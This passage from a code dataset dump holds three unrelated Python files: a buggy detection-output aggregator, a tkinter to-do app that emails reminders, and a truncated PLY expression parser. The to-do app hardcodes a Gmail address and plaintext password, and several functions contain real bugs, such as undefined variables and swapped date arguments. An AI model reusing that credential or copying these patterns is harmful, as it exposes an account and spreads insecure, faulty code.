xrange(self.num_classes)]\n self.results = all_boxes\n self.det_file = os.path.join(output_dir, 'probs.pkl')\n self.save_key = 'all_boxes'\n elif self.task == 'classification':\n all_probs = [[-1 for _ in xrange(self.num_samples)]\n for _ in xrange(self.num_classes)]\n self.results = all_probs\n self.det_file = os.path.join(output_dir, 'probs.pkl')\n self.save_key = 'all_probs'\n elif self.task == 'regression':\n all_estimates = [None for _ in xrange(self.num_samples)]\n self.results = all_estimates\n self.det_file = os.path.join(output_dir, 'regression.pkl')\n self.save_key = 'all_probs'\n else:\n raise ValueError(\"unknown task [agg_model_output.py]: {}\".format(self.task))\n\n def clear(self):\n if self.task == 'object_detection':\n all_boxes = [[[] for _ in xrange(self.num_samples)]\n for _ in xrange(self.num_classes)]\n self.results = all_boxes\n elif self.task == 'classification':\n all_probs = [[-1 for _ in xrange(self.num_samples)]\n for _ in xrange(self.num_classes)]\n self.results = all_probs\n elif self.task == 'regression':\n all_estimates = [[] for _ in xrange(self.num_samples)]\n self.results = all_estimates\n else:\n raise ValueError(\"unknown task [agg_model_output.py]: {}\".format(self.task)) \n\n def aggregate(self,model_output,sample_index):\n if self.task == 'object_detection':\n self.aggregateDetections(model_output,sample_index)\n elif self.task == 'classification':\n self.aggregateClassification(model_output['scores'],sample_index)\n elif self.task == 'regression':\n self.aggregateRegression(model_output['scores'],sample_index)\n else:\n raise ValueError(\"unknown task [agg_model_output.py]: {}\".format(self.task))\n\n def load(self):\n results = self.save_cache.load()\n if results is not None:\n self.results = results\n return results\n\n def save(self):\n self.save_cache.save(self.results)\n\n def aggregateClassification(self,scores,sample_index):\n # handle special case\n if scores.size == 1:\n self.results[0][sample_index] = float(scores)\n return\n scores = np.squeeze(scores)\n if self.num_classes == 1:\n self.results[0][sample_index] = float(scores[0])\n else:\n if len(scores) != len(self.results):\n print(\"do you need to use 'corg'? nclasses for (model_output_size,data) = ({},{})\".format(len(scores),len(self.results)))\n for class_index in xrange(0, self.num_classes):\n self.results[class_index][sample_index] = float(scores[class_index])\n\n def aggregateDetections(self,model_output,sample_index):\n scores = model_output['scores']\n boxes = model_output['scores']\n for class_index in xrange(1, self.num_classes):\n inds = np.where(scores[:, j] > self.score_thresh)[0]\n cls_scores = scores[inds, j]\n cls_boxes = boxes[inds, j*4:(j+1)*4]\n cls_dets = np.hstack((cls_boxes, cls_scores[:, np.newaxis])) \\\n .astype(np.float32, copy=False)\n keep = nms(cls_dets, self.nms_thresh)\n cls_dets = cls_dets[keep, :]\n if vis:\n vis_detections(im, self.classes[class_index], cls_dets)\n self.results[class_index][sample_index] = cls_dets\n # Limit to max_per_image detections *over all classes*\n if self.max_dets_per_image:\n image_scores = np.hstack([self.results[class_index][sample_index][:, -1] for class_index in xrange(1, self.num_classes)])\n if len(image_scores) > self.max_dets_per_image:\n image_thresh = np.sort(image_scores)[-self.max_dets_per_image]\n for class_index in xrange(1, self.num_classes):\n keep = np.where(self.results[class_index][sample_index][:, -1] >= image_thresh)[0]\n self.results[class_index][sample_index] = self.results[class_index][sample_index][keep, :]\n\n def aggregateRegression(self,regression_values,sample_index):\n self.results[sample_index] = regression_values[0][0]\n\n def visualizeCheck(self,vis_override):\n if vis_override is True:\n return True\n else:\n return self.visualize_bool\n\n def visualizeDetectionsByClass(self,scores,boxes,image,vis_override=False):\n if self.visualizeCheck(vis_override) is False: return\n import matplotlib\n matplotlib.use('Agg')\n for class_index in xrange(1, self.num_classes):\n inds = np.where(scores[:, class_index] > self.score_thresh)[0]\n cls_scores = scores[inds, class_index]\n cls_boxes = boxes[inds, class_index*4:(j+1)*class_index]\n cls_dets = np.hstack((cls_boxes, cls_scores[:, np.newaxis])).astype(np.float32, copy=False)\n keep = nms(cls_dets, self.nms_thresh)\n cls_dets = cls_dets[keep, :]\n cls_name = self.classes[class_index]\n visualizeDetectionsOneClass(image, cls_dets, cls_name)\n\n def visualizeDetectionsOneClass(self,image, dets, class_name, thresh=0.3,vis_override=False):\n \"\"\"Visual debugging of detections.\"\"\"\n if self.visualizeCheck(vis_override) is False: return\n import matplotlib.pyplot as plt\n im = im[:, :, (2, 1, 0)]\n for i in xrange(np.minimum(10, dets.shape[0])):\n bbox = dets[i, :4]\n score = dets[i, -1]\n if score > thresh:\n plt.cla()\n plt.imshow(im)\n plt.gca().add_patch(\n plt.Rectangle((bbox[0], bbox[1]),\n bbox[2] - bbox[0],\n bbox[3] - bbox[1], fill=False,\n edgecolor='g', linewidth=3)\n )\n plt.title('{} {:.3f}'.format(class_name, score))\n plt.show()\n","sub_path":"lib/core/test_utils/agg_model_output.py","file_name":"agg_model_output.py","file_ext":"py","file_size_in_byte":7258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272574818","text":"# To-do List\n\n# Imports\n# GUI\nimport tkinter as tk\nimport tkinter.messagebox as messagebox\nfrom tkinter import *\nfrom tkinter.font import Font\nfrom tkmacosx import Button, CircleButton\n\n# Audio\nfrom playsound import playsound\n\n# Date and time\nimport datetime\n\n# Images\nfrom PIL import Image, ImageTk\n\n# Data storage\nimport json\n\n# Notifications\nimport os\n\n# Email\nimport smtplib\n\n# Email verification\nfrom validate_email import validate_email\n\n# Title and message for 'email sent' confirmation\ntitle = \"To-do List\"\nmessage = \"Success; email has been sent\"\n\n\n# Housing of the program\nclass ToDo:\n def __init__(self):\n self.root_1 = tk.Tk()\n self.root_1.title(\"To-do List\") # Title of the window\n self.root_1.geometry('370x500+600+75') # Window size\n self.root_1.resizable(False, False) # Disable window resizing\n\n # Main body (1)\n # Switching between the home page and the settings page will be done so by\n # creating a frame, then deleting the prior frame\n def home(self):\n # Reading the JSON file (denoted by \"r\")\n with open(\"data.json\", \"r\") as file:\n self.data = json.load(file)\n\n # Creates a new frame for the home page\n self.root = tk.Frame(self.root_1, width=370, height=500,\n bg=self.data[\"bg_colour\"])\n self.root.place(x=0, y=0)\n\n # Title (1)\n # Font\n self.title_label_font = Font(\n family=\"SF Pro Rounded\", # Font name\n size=20, # Font size\n weight=\"bold\" # Font weight\n )\n # Title name and colour\n self.title_label = tk.Label(self.root, text=\"To-do List\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.title_label.place(x=30, y=25)\n\n # Inputs (1)\n # Task name entry\n self.new_task_entry_var = tk.StringVar() # Holds a string\n self.new_task_entry = Entry(self.root,\n textvariable=self.new_task_entry_var,\n width=11)\n self.new_task_entry.place(x=35, y=75)\n # Time entry\n self.new_task_time_var = tk.StringVar()\n # Places the current time into the input field\n self.current_time = datetime.datetime.now()\n # Converts the time using strftime where we are able to denote hours\n # by %H and minutes by %M\n self.current_time = self.current_time.strftime(\n \"%H\") + \":\" + self.current_time.strftime(\"%M\")\n self.new_task_time_var.set(str(self.current_time))\n self.new_task_time = Entry(self.root,\n textvariable=self.new_task_time_var,\n width=5)\n self.new_task_time.place(x=156, y=75)\n # Date entry\n self.date_var = tk.StringVar()\n # Places the current date into the input field\n self.current_day = datetime.datetime.now()\n # Identifies \"locale’s appropriate date representation\" (%x)\n self.current_day = self.current_day.strftime(\"%x\")\n self.date_var.set(self.current_day)\n self.data_entry = Entry(self.root, textvariable=self.date_var, width=7)\n self.data_entry.place(x=223, y=75)\n\n # List (1)\n # Displays all inputted tasks\n self.list_tasks = tk.Listbox(self.root, width=29, height=16,\n selectmode='single')\n self.list_tasks.place(x=35, y=125)\n\n # Buttons (1)\n # Button which adds a task\n self.add_image = ImageTk.PhotoImage(Image.open(\"/Users/vic\"\n \"/PycharmProjects\"\n \"/todo/images/add.png\"))\n self.add_task_button = CircleButton(self.root, image=self.add_image,\n bg='#ffffff', fg='#000000',\n borderless=1,\n width=35, command=self.add_task)\n self.add_task_button.place(x=308, y=71)\n\n # Makes it so the tasks which are stored in data.json show up in the\n # list of the GUI\n for i in self.data[\"data\"]:\n # inserts tasks so that task: name - time date\n self.list_tasks.insert(tk.END, i[0] + \" - \" + i[1] + \" \" + i[2])\n\n # Button which deletes the selected task\n self.delete_selected = Button(self.root, text=\"Delete\", bg='#ffffff',\n fg='#000000', borderless=1,\n activebackground=('#CD3F5D', '#CD3F5D'),\n command=self.delete_selected_func)\n self.delete_selected.place(x=35, y=423)\n # Button which deletes all inputted tasks\n self.delete_all = Button(self.root, text=\"Delete All\", bg='#ffffff',\n fg='#000000', borderless=1,\n activebackground=('#CD3F5D', '#CD3F5D'),\n command=self.delete_all_func)\n self.delete_all.place(x=130, y=423)\n # Button which opens up the settings page\n self.settings_image = ImageTk.PhotoImage(\n Image.open(\"/Users/vic/PycharmProjects/todo/images/settings.png\"))\n self.settings_button = CircleButton(self.root,\n image=self.settings_image,\n bg='#ffffff', fg='#000000',\n borderless=1, width=35,\n command=self.settings)\n self.settings_button.place(x=308, y=418)\n\n self.root_1.after(50, self.send_email())\n\n self.root_1.mainloop()\n\n # Deletes selected task\n def delete_selected_func(self):\n playsound(\"/Users/vic/PycharmProjects/todo/audio/delete.mp3\")\n # Identifies selected task from listbox\n for i in self.list_tasks.curselection():\n self.data[\"data\"].pop(i)\n\n self.list_tasks.delete(tk.ANCHOR)\n\n # Writing to the JSON file (denoted by the \"w\") - removing selected\n # task\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n\n # Deletes all inputted tasks\n def delete_all_func(self):\n playsound(\"/Users/vic/PycharmProjects/todo/audio/delete_all.mp3\")\n # Deletes first task - last task that was inputted\n self.list_tasks.delete(\"0\", \"end\")\n # Rewrites JSON / makes data section blank\n self.data[\"data\"] = []\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n\n # Adds task\n def add_task(self):\n playsound(\"/Users/vic/PycharmProjects/todo/audio/add.mp3\")\n # If there is an email inputted\n if self.data[\"email\"]:\n # If the entry task is blank, (\\ for syntax purposes)\n if self.new_task_entry_var.get() == \"\" or \\\n self.new_task_time_var.get() == \"\" or \\\n self.date_var.get() == \"\":\n messagebox.showinfo(\"Invalid Input!\",\n \"An input appears to be blank\")\n return\n try:\n # Removes : and / from time and date to make them \"simple\"\n int(self.new_task_time_var.get().replace(\":\", \"\"))\n int(self.date_var.get().replace(\"/\", \"\"))\n\n # i = task name, time, date\n i = [\"\", self.new_task_time_var.get(),\n self.date_var.get()]\n\n # Python lists start at 0\n # e.g. i[2][-2] will go to the second element of JSON which is\n # the date, and take the last 2 numbers ([-2] and [-1])\n # (index)\n year = \"20\" + i[2][-2] + i[2][-1]\n year = int(year)\n month = i[2][-5] + i[2][-4]\n month = int(month)\n day = i[2][0] + i[2][1]\n day = int(day)\n hour = i[1][0] + i[1][1]\n hour = int(hour)\n minute = i[1][-2] + i[1][-1]\n minute = int(minute)\n\n date_old = datetime.datetime(year, day, month, hour, minute)\n\n if datetime.datetime.now() > date_old:\n messagebox.showinfo(\"Invalid Input!\",\n \"Inputted time and/or date is before \"\n \"the actual time\")\n return\n else:\n self.list_tasks.insert(tk.END,\n self.new_task_entry_var.get() +\n \" - \" +\n self.new_task_time_var.get() + \" \" +\n self.date_var.get())\n # Appending the added task into the JSON\n self.data[\"data\"].append([self.new_task_entry_var.get(),\n self.new_task_time_var.get(),\n self.date_var.get(), \"1\"])\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n\n except:\n messagebox.showinfo(\"Invalid Input!\",\n \"Invalid date or time format\")\n return\n\n else:\n messagebox.showinfo(\"Invalid Input!\",\n \"An email has not been inputted\")\n\n # Settings page (2)\n def settings(self):\n # Creates a new frame for the preferences page\n self.root = tk.Frame(self.root_1, width=370, height=500,\n bg=self.data[\"bg_colour\"])\n self.root.place(x=0, y=0)\n\n # Title (2)\n # Font\n self.title_label_font = Font(\n family=\"SF Pro Rounded\",\n size=20,\n weight=\"bold\"\n )\n # Title name and colour - Preferences\n self.title_label = tk.Label(self.root, text=\"Preferences\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.title_label.place(x=30, y=35)\n\n # Buttons (2)\n # Button which returns back to the home page\n self.back_button = Button(self.root, text=\"Back\", bg='#ffffff',\n fg='#000000', borderless=1,\n command=self.home)\n self.back_button.place(x=3, y=3)\n\n # Options\n # Themes\n # Title name and colour - Themes\n self.pref_label = tk.Label(self.root, text=\"Themes\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.pref_label.place(x=30, y=80)\n\n # Button which alters the theme and text colour\n # The self.change_bg(\"bg, text\") refers back to the def\n # White background, black text\n self.colour_white = Button(self.root, font=\"15\",\n bg='#F4F3F1', fg='#F4F3F1', borderless=1,\n width=25, highlightbackground='#2E2F30',\n command=lambda: self.change_bg('#F4F3F1',\n \"black\"))\n self.colour_white.place(x=35, y=125)\n # Black background, white text\n self.colour_black = Button(self.root, font=\"15\",\n bg='#232326', fg='#232326', borderless=1,\n width=25,\n command=lambda: self.change_bg('#232326',\n \"white\"))\n self.colour_black.place(x=65, y=125)\n # Red background, black text\n self.colour_red = Button(self.root, font=\"15\",\n bg='#CD3F5D',\n fg='#CD3F5D', borderless=1, width=25,\n highlightbackground='#CD3F5D',\n command=lambda: self.change_bg('#CD3F5D',\n \"black\"))\n self.colour_red.place(x=95, y=125)\n # Green background, black text\n self.colour_green = Button(self.root, font=\"15\",\n bg='#00AD92', fg='#00AD92',\n borderless=1,\n width=25,\n highlightbackground='#00AD92',\n command=lambda: self.change_bg(\n '#00AD92', \"black\"))\n self.colour_green.place(x=125, y=125)\n # Blue background, black text\n self.colour_blue = Button(self.root, font=\"15\",\n bg='#728EE3', fg='#728EE3',\n borderless=1,\n width=25,\n highlightbackground='#728EE3',\n command=lambda: self.change_bg(\n '#728EE3', \"black\"))\n self.colour_blue.place(x=155, y=125)\n\n # Email\n # Title name and colour - Email\n self.email_label = tk.Label(self.root, text=\"Email\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.email_label.place(x=30, y=190)\n # Email entry\n self.email_entry_var = tk.StringVar()\n self.email_entry_var.set(self.data[\"email\"])\n self.email_entry = Entry(self.root, textvariable=self.email_entry_var,\n width=32)\n self.email_entry.place(x=35, y=235)\n # Button which changes the set email\n self.change = Button(self.root, text=\"Change\", bg='#ffffff',\n fg='#000000', borderless=1,\n command=self.change_func)\n self.change.place(x=32, y=285)\n\n # Help\n # Title name and colour - Help\n self.instructions_label = tk.Label(self.root, text=\"Help\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.instructions_label.place(x=30, y=350)\n # Button which opens the instructions window\n self.instructions = Button(self.root, text=\"Instructions\",\n bg='#ffffff', fg='#000000', borderless=1,\n command=self.instructions_func)\n self.instructions.place(x=32, y=395)\n # Button which opens the requirements window\n self.requirements = Button(self.root, text=\"Requirements\",\n bg='#ffffff', fg='#000000', borderless=1,\n command=self.requirements_func)\n self.requirements.place(x=32, y=426)\n self.root.mainloop()\n\n # Changes the theme\n def change_bg(self, background, foreground):\n # Sets position in JSON file to refer to\n self.data[\"bg_colour\"] = background\n self.data[\"text_colour\"] = foreground\n # Writes to JSON file\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n messagebox.showinfo(\"Done!\", \"The theme has been altered\")\n self.settings()\n\n # Changes the email\n def change_func(self):\n playsound(\"/Users/vic/PycharmProjects/todo/audio/add.mp3\")\n # If the inputted email is valid\n if validate_email(self.email_entry_var.get()):\n # If the amount of tasks in the list is 0 (denoted by len),\n # proceed to change the email, otherwise, present an error\n # message\n if len(self.data[\"data\"]) == 0:\n self.data[\"email\"] = self.email_entry_var.get()\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n messagebox.showinfo(\"Done!\",\n \"Email changed to \" +\n self.email_entry_var.get())\n else:\n messagebox.showinfo(\"Error!\",\n \"Please to do not alter the email\"\n \" address when there are active\"\n \" tasks\")\n return\n else:\n messagebox.showinfo(\"Error!\", \"The email entered is invalid\")\n self.settings()\n\n # Email functionality\n def send_email(self):\n\n for i in self.data[\"data\"]:\n if bool(int(i[3])):\n year = \"20\" + i[2][-2] + i[2][-1]\n year = int(year)\n month = i[2][-5] + i[2][-4]\n month = int(month)\n day = i[2][0] + i[2][1]\n day = int(day)\n hour = i[1][0] + i[1][1]\n hour = int(hour)\n minute = i[1][-2] + i[1][-1]\n minute = int(minute)\n\n date_old = datetime.datetime(year, day, month, hour, minute,\n 00, 798408)\n\n try:\n if datetime.datetime.now() > date_old:\n # SMTP port number: 587\n self.smtp_session = smtplib.SMTP('smtp.gmail.com', 587)\n self.smtp_session.starttls()\n # Mailing address (email and password)\n self.smtp_session.login(\"mailtemp025@gmail.com\",\n \"Fluffy15010hi\")\n # Confirmation that email has been sent\n command = f'''\n osascript -e 'display notification \"\n {message}\" with title \"{title}\"'\n '''\n os.system(command)\n # Email message sent (f-string)\n # i[0] refers to the message i[1] refers to th time\n # i[2] refers to the date, i[3] refers to the\n # indicator\n self.message = f\"The task '{i[0]}' is due right now\"\n\n self.smtp_session.sendmail(\"mailtemp025@gmail.com\",\n self.data[\"email\"],\n self.message)\n\n self.smtp_session.quit()\n # Set the 1 to 0 in the data.json to indicate an email\n # has been sent\n i[3] = \"0\"\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n # needed to fix syntax issue with 'with'\n except:\n pass\n\n self.root.after(50, self.send_email)\n\n # Help menu\n # Instructions\n def instructions_func(self):\n messagebox.showinfo(\"Help\",\n \"Instructions \"\n \"\\n \\n 1. Input a task by specifying a title, \"\n \"date and time. To add a task, click the + button.\"\n \"\\n \\n 2. Once the set time is reached, \"\n \"an email will be sent. Click the delete button \"\n \"to then remove the task from the list.\"\n \"\\n \\n 3. Clicking the settings button will \"\n \"open up the preferences menu.\")\n\n # Requirements\n def requirements_func(self):\n messagebox.showinfo(\"Help\",\n \"Requirements \"\n \"\\n \\n 1. An email is required in order to input \"\n \"tasks.\"\n \"\\n \\n 2. This application uses 24 hour time for \"\n \"inputs.\"\n \"\\n \\n 3. An internet connection is needed for \"\n \"email capabilities to function.\"\n \"\\n \\n 4. MacOS is the only supported platform\")\n\n\nmain = ToDo()\nmain.home()\n","sub_path":"components/task functionality (6).py","file_name":"task functionality (6).py","file_ext":"py","file_size_in_byte":20755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506737836","text":"# Wei Chen\n# 110926494\n# 4/5/19\nimport ply.lex as lex\nimport sys\nimport ply.yacc as yacc\n\n# debugging = True\ndebugging = False\n\n\ndef debug(s, t=\"\"):\n global debugging\n if debugging:\n print(s, t)\n\n\nclass Node:\n def __init__(self):\n self.value = -1\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n\nclass BooleanNode(Node):\n def __init__(self, s):\n super().__init__()\n # debug(\"Boolean \")\n if s == 'True' or s == True:\n self.value = True\n else:\n self.value = False\n\n def negate(self):\n debug(\"BooleanNode negate:\", self.value)\n self.value = not self.value\n debug(\"BooleanNode negate:\", self.value)\n return self\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n # print(str(self.value).lower())\n # return str(self.value).lower()\n return self.value\n\n\nclass StringNode(Node):\n def __init__(self, s):\n super().__init__()\n self.value = str(s)\n\n def get_element(self, index):\n if index < 0:\n raise Exception(\"string index cannot be negative\")\n return StringNode(self.value[index])\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n def replace(self, param, param1):\n self.value = self.value.replace(param, param1)\n pass\n\n\nclass NumberNode(Node):\n def __init__(self, v):\n super().__init__()\n if '.' in v or 'e' in v:\n self.value = float(v)\n else:\n self.value = int(v)\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n\nclass IntNode(NumberNode):\n def __init__(self, v):\n super().__init__(v)\n self.value = int(v)\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n\nclass FloatNode(NumberNode):\n def __init__(self, v):\n super().__init__(v)\n self.value = float(v)\n\n def evaluate(self):\n return self.value\n\n def execute(self):\n return self.value\n\n\nclass UminusNode(Node):\n def __init__(self, v):\n super().__init__()\n # print(v,)\n self.value = -v.evaluate()\n\n def evaluate(self):\n return self.value\n\n\nclass ComparisonNode(BooleanNode):\n def __init__(self, comparator, v1, v2):\n super().__init__(False)\n self.comparator = comparator\n self.v1 = v1\n self.v2 = v2\n debug(\"ComparisonNode: compare= \", comparator)\n debug(\"ComparisonNode: v1= \", v1)\n debug(\"ComparisonNode: v2= \", v2)\n\n def evaluate(self):\n v1 = self.v1.evaluate()\n v2 = self.v2.evaluate()\n debug(\"ComparisonNode: v1= \", v1)\n debug(\"ComparisonNode: v2= \", v2)\n if isinstance(v1, bool) or isinstance(v2, bool):\n raise ValueError\n if not ((isinstance(v1, (int,float)) and isinstance(v2, (int,float))) or (isinstance(v1, str) and isinstance(v2, str))):\n raise ValueError\n try:\n if self.comparator == '<':\n self.value = v1 < v2\n elif self.comparator == '>':\n self.value = (v1 > v2)\n\n elif self.comparator == '<=':\n self.value = (v1 <= v2)\n elif self.comparator == '>=':\n self.value = (v1 >= v2)\n elif self.comparator == '==':\n self.value = (v1 == v2)\n elif self.comparator == '<>':\n self.value = (v1 < v2 or v1 > v2)\n\n return self.value\n except Exception:\n raise Exception(\"SEMANTIC ERROR\")\n\n def execute(self):\n self.evaluate()\n # print(\"compare execute\")\n return self.value\nclass BoolOpNode(BooleanNode):\n def __init__(self, comparator, v1, v2):\n super().__init__(False)\n self.comparator = comparator\n self.v1 = v1\n self.v2 = v2\n\n def evaluate(self):\n v1 = self.v1.evaluate()\n v2 = self.v2.evaluate()\n if not (isinstance(v1, bool) and isinstance(v2, bool)):\n raise ValueError\n try:\n if self.comparator == 'andalso':\n self.value = (v1 and v2)\n elif self.comparator == 'orelse':\n self.value = (v1 or v2)\n return self.value\n except Exception:\n raise ValueError(\"SEMANTIC ERROR\")\n\n def execute(self):\n self.evaluate()\n # print(\"compare execute\")\n return self.value\n\n\nclass BopNode(Node):\n def __init__(self, op, v1, v2):\n super().__init__()\n self.v1 = v1\n self.v2 = v2\n self.op = op\n self.value = 0\n\n def evaluate(self):\n v1 = self.v1.evaluate()\n v2 = self.v2.evaluate()\n if isinstance(v1, bool) or isinstance(v2, bool):\n raise ValueError\n try:\n if self.op == '+':\n self.value = v1 + v2\n elif self.op == '-':\n # if not isinstance(v1,int) or not isinstance(v2,int):\n # raise ValueError\n self.value = v1 - v2\n elif self.op == '*':\n self.value = v1 * v2\n\n elif self.op == '/':\n\n self.value = v1 / v2\n elif self.op == '**':\n self.value = v1 ** v2\n elif self.op == 'mod':\n if isinstance(v1, int) and isinstance(v2, int):\n self.value = v1 % v2\n else:\n raise ValueError\n elif self.op == 'div':\n if isinstance(v1, int) and isinstance(v2, int):\n self.value = v1 // v2\n else:\n raise ValueError\n\n debug(self.value)\n return self.value\n except Exception as e:\n debug(e)\n raise Exception(\"SEMANTIC ERROR\")\n\n def execute(self):\n debug(self.value)\n self.evaluate()\n return self.value\n\n\nclass ListNode(Node):\n def __init__(self, v=None):\n super().__init__()\n if v is None:\n self.value = []\n else:\n self.value = [v]\n\n def append(self, v):\n self.value.append(v)\n return self\n\n def cons(self, v):\n self.value.insert(0, v)\n return self\n\n def get_element(self, index):\n if index < 0:\n raise Exception(\"SEMANTIC ERROR\")\n return self.value[index]\n\n def evaluate(self):\n return [x.evaluate() for x in self.value]\n\n def execute(self):\n return [x.execute() for x in self.value]\n\n\nclass TupleNode(Node):\n def __init__(self, l):\n # TupleNode takes in a list and convert to tuple\n # Maybe takes a ListNode?\n super().__init__()\n self.value = tuple(l)\n\n def get_element(self, index):\n if index <= 0:\n raise Exception(\"SEMANTIC ERROR\")\n return self.value[index - 1]\n\n def evaluate(self):\n return tuple([x.evaluate() for x in self.value])\n\n def execute(self):\n return tuple([x.execute() for x in self.value])\n\n\ntokens = [\n 'NUMBER', 'INTEGER', 'REAL', 'STRING', 'BOOLEAN',\n 'PLUS', 'MINUS', 'TIMES', 'DIVIDE', 'POWER', 'MOD', 'DIV',\n 'LPAREN', 'RPAREN', 'LBRACKET', 'RBRACKET',\n 'COMMA', 'HASHTAG', 'SEMICOLON', 'IN', 'CONS',\n 'LES', 'GRT', 'LEQ', 'GEQ', 'EQUALEQUAL', 'LESORGRT',\n 'NOT', 'ANDALSO', 'ORELSE',\n ]\n\n# Tokens\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_LBRACKET = r'\\['\nt_RBRACKET = r'\\]'\nt_COMMA = r','\nt_SEMICOLON = r';'\nt_HASHTAG = r'[#]'\nt_POWER = r'\\*\\*'\nt_MOD = r'mod'\nt_DIV = r'div'\nt_IN = r'in'\nt_CONS = r'::'\nt_EQUALEQUAL = r'=='\nt_LES = r'<'\nt_GRT = r'>'\nt_LEQ = r'<='\nt_GEQ = r'>='\nt_LESORGRT = r'<>'\nt_NOT = r'not'\nt_ANDALSO = r'andalso'\nt_ORELSE = r'orelse'\n\n\ndef t_NUMBER(t):\n r'\\d*(\\d\\.|\\.\\d)\\d*([eE]-?\\d+)?|\\d+'\n try:\n t.value = NumberNode(t.value)\n debug(t.value.value)\n except ValueError:\n raise SyntaxError(\"SYNTAX ERROR_NUMBER\")\n # t.value = 0\n return t\n\n\ndef t_STRING(t):\n r'(\\'(\\\\\\n|\\\\\\\\|\\\\\\\"|\\\\\\'|\\\\\\t|[^\\\\\\'])*\\')|(\\\"(\\\\\\n|\\\\\\\\|\\\\\\\"|\\\\\\'|\\\\\\t|[^\\\\\\\"])*\\\")'\n\n try:\n debug(t.value[1:-1])\n # string = str(t.value.replace(\"\\\\\\\\\", \"\\\\\")\n # .replace('\\\\\\n', '\\n')\n # .replace('\\\\\\'', '\\'')\n # .replace('\\\\\\\"', '\\\"')\n # .replace('\\\\\\t', '\\t')\n # )\n\n t.value = StringNode(t.value[1:-1])\n except ValueError:\n raise SyntaxError(\"SYNTAX ERROR STR\")\n # t.value = ''\n debug(t)\n return t\n\n\ndef t_BOOLEAN(t):\n r'(True)|(False)'\n t.value = BooleanNode(t.value)\n return t\n\n\n# Ignored characters\nt_ignore = \" \\t\"\n\n\ndef t_error(t):\n raise SyntaxError(\"SYNTAX ERROR_token not found\")\n\n\n# Build the lexer\nlex.lex(debug = 0)\n\n# Parsing rules\nprecedence = (\n ('left', 'ORELSE'),\n ('left', 'ANDALSO'),\n ('left', 'NOT'),\n ('left', 'LES', 'GRT', 'LEQ', 'GEQ', 'EQUALEQUAL', 'LESORGRT'),\n ('right', 'CONS'),\n ('left', 'IN'),\n ('left', 'PLUS', 'MINUS'),\n ('left', 'TIMES', 'DIVIDE', 'MOD', 'DIV'),\n ('right', 'UMINUS'),\n ('right', 'POWER'),\n ('nonassoc', 'LBRACKET', 'RBRACKET'),\n ('left', 'HASHTAG'),\n ('nonassoc', 'LPAREN', 'RPAREN'),\n)\n\n\nclass PrintNode(Node):\n def __init__(self, v):\n super().__init__()\n if isinstance(v, str):\n v = \"'\" + v + \"'\"\n self.value = v\n\n def execute(self):\n # self.value = self.value.evaluate\n print(self.value)\n return self.value\n\ndef p_expression_statement(t):\n 'statement : expression SEMICOLON'\n debug(\"p_expression_statement:\", t[1])\n debug(\"p_expression_statement:\", t[1].value)\n debug(\"p_expression_statement:\", t[1].evaluate())\n t[0] = PrintNode(t[1].evaluate())\n\n # print(t[1])\n\n\ndef p_expression_group(t):\n 'expression : LPAREN expression RPAREN'\n # print(\"p_expression_group\")\n t[0] = t[2]\n\n\ndef p_expression_binop(t):\n '''expression : expression PLUS expression\n | expression MINUS expression\n | expression TIMES expression\n | expression DIVIDE expression\n | expression POWER expression\n | expression MOD expression\n | expression DIV expression'''\n debug(\"p_expression_binop\")\n # print(t[1].value)\n # print(t[3].value)\n t[0] = BopNode(t[2], t[1], t[3])\n debug(t[0])\n\n\ndef p_expression_elements(t):\n '''elements : elements COMMA expression\n | expression'''\n if len(t) > 2:\n t[1].append(t[3])\n t[0] = t[1]\n # print(\"p_expression_elements if\", t[0].execute())\n else:\n # print(\"p_expression_elements else\", )\n\n t[0] = ListNode(t[1])\n # print(t[0].execute())\n\n\ndef p_expression_tuple(t):\n '''tuple : LPAREN elements RPAREN\n | LPAREN RPAREN'''\n\n if len(t) > 3:\n t[0] = TupleNode(t[2].value) # t[2] = elements seperated by comma, ex. \"1,2,3\"\n else:\n t[0] = TupleNode([])\n\n\ndef p_expression_tuple_index(t):\n '''indexing : HASHTAG expression LPAREN expression RPAREN\n | HASHTAG expression expression '''\n # print(\"p_expression_tuple_index\")\n # print(t[2])\n index = t[2].evaluate()\n if isinstance(index, bool) or not isinstance(index, int):\n raise ValueError\n if len(t) > 4:\n t[0] = t[4].get_element(index)\n else:\n t[0] = t[3].get_element(index)\n\n\ndef p_expression_list(t):\n '''list : LBRACKET elements RBRACKET\n | LBRACKET RBRACKET'''\n debug(\"p_expression_list\")\n if len(t) > 3:\n # print(\"p_expression_list if\")\n t[0] = t[2]\n else:\n # print(\"p_expression_list else\")\n t[0] = ListNode()\n\n\ndef p_expression_list_index(t):\n 'indexing : expression LBRACKET expression RBRACKET'\n\n # print(t[3])\n index = t[3].evaluate()\n debug(\"p_expression_list_index\", index)\n if isinstance(index, bool) or not isinstance(index, int) or not isinstance(t[1], (ListNode, StringNode)):\n raise ValueError\n t[0] = t[1].get_element(index)\n\n\ndef p_expression_in(t):\n 'expression : expression IN expression'\n # t1 can be anything, when t3 is list\n # t1 must be str when t3 is str\n t3 = t[3].evaluate()\n t1 = t[1].evaluate()\n if isinstance(t3, list):\n condition = t1 in t3\n t[0] = 